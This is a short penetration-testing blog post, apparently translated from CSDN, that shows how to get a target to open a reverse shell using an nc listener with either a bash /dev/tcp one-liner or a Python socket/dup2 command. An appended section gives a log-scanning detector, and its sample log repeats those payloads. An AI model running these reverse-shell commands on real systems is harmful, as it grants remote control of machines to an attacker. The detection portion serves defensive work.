Disclaimer: This is an original article by the blogger and may not be reproduced without the blogger's permission. https://blog.csdn.net/qq1124794084/article/details/87285316
During penetration testing, we often need the test target to connect a shell back to our host (a reverse shell) so that testing is more convenient. For example, when testing an injection, you can bounce a shell back for further testing.
One, nc and bash
Run nc -lvp port on our host
Once running, it shows the port it is listening on
Run bash -i >& /dev/tcp/ip/port 0>&1 on the target host
We can then execute commands on the target from our host
Two, nc and python
Run nc -lvp port on our host
Once running, it shows the port it is listening on
Execute the following command on the target server
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
Remember to change ip and port to the IP address and listening port of our host
Test results are as follows
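Separately from the test above, and seen from the defending side: both one-liners leave a recognisable process command line. The following is an added example, not part of the original post, that flags the two patterns in process-execution audit lines; the "pid=... cmd=..." log layout, the rule names and the sample lines (documentation IP addresses) are constructed assumptions.

```python
import re

# Constructed sample of process-execution audit lines. The "pid=<n> cmd=<argv>"
# layout is an assumption; adapt the parsing to auditd, an EDR export, etc.
SAMPLE_LOG = """\
pid=4101 cmd=bash -i
pid=4102 cmd=sh -c bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
pid=4103 cmd=bash -c echo > /dev/tcp/192.0.2.20/443
pid=4104 cmd=python -c import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.0.2.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
pid=4105 cmd=python3 -c import socket;print(socket.gethostname())
"""

LINE = re.compile(r"^pid=(\d+) cmd=(.*)$")
# bash's /dev/tcp/<host>/<port> pseudo-device used as a redirection target
DEVTCP = re.compile(r"/dev/(?:tcp|udp)/([^/\s]+)/(\d+)")
# an interactive shell (-i) started within the same simple command
INTERACTIVE_SH = re.compile(r"\b(?:ba|z|da)?sh\b[^|;&]*\s-i\b")
# socket.connect(('host', port)) with literal arguments
PY_CONNECT = re.compile(r"\.connect\(\(\s*['\"]([^'\"]+)['\"]\s*,\s*(\d+)\s*\)\)")
PY_DUP2 = re.compile(r"\bdup2\s*\(")
SHELL_PATH = re.compile(r"/bin/(?:ba|z|da)?sh\b")
PY_INLINE = re.compile(r"python[\d.]*\s+-c\b")


def scan(log_text):
    """Return (pid, rule, destination) for each line matching one of the two patterns."""
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        pid, cmd = int(m.group(1)), m.group(2)
        dev = DEVTCP.search(cmd)
        if dev and INTERACTIVE_SH.search(cmd):
            # interactive shell whose stdio is redirected to a network endpoint
            hits.append((pid, "bash-devtcp", f"{dev.group(1)}:{dev.group(2)}"))
        elif (PY_INLINE.match(cmd) and "socket" in cmd
              and PY_DUP2.search(cmd) and SHELL_PATH.search(cmd)):
            # inline Python that dup2()s a socket onto stdio and spawns a shell
            conn = PY_CONNECT.search(cmd)
            dest = f"{conn.group(1)}:{conn.group(2)}" if conn else "unknown"
            hits.append((pid, "python-socket-dup2", dest))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Shell redirections only show up in a logged command line when the whole string is passed to sh -c (as it typically is through an injection); a command typed at a prompt is recorded as just bash -i, so pair this with a check for shells whose stdin is a network socket.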